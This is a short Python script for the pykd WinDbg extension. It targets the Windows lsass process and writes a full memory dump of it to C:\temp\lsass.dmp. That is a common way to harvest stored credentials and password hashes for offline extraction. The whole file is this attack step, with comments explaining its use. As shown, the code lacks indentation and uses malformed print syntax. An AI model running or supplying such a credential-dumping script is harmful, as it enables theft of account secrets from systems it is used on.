from pykd import *
#Dirty way to get processname
#getProcessExeName doesnt works for me
pname = dbgCommand("!process").split("\n")[3]
#we only target lsass
if "lsass" in pname:
#you can use .writemem too
pname = dbgCommand(".dump /f /o /u C:\\temp\\lsass.dmp")
dprint "lsass saved"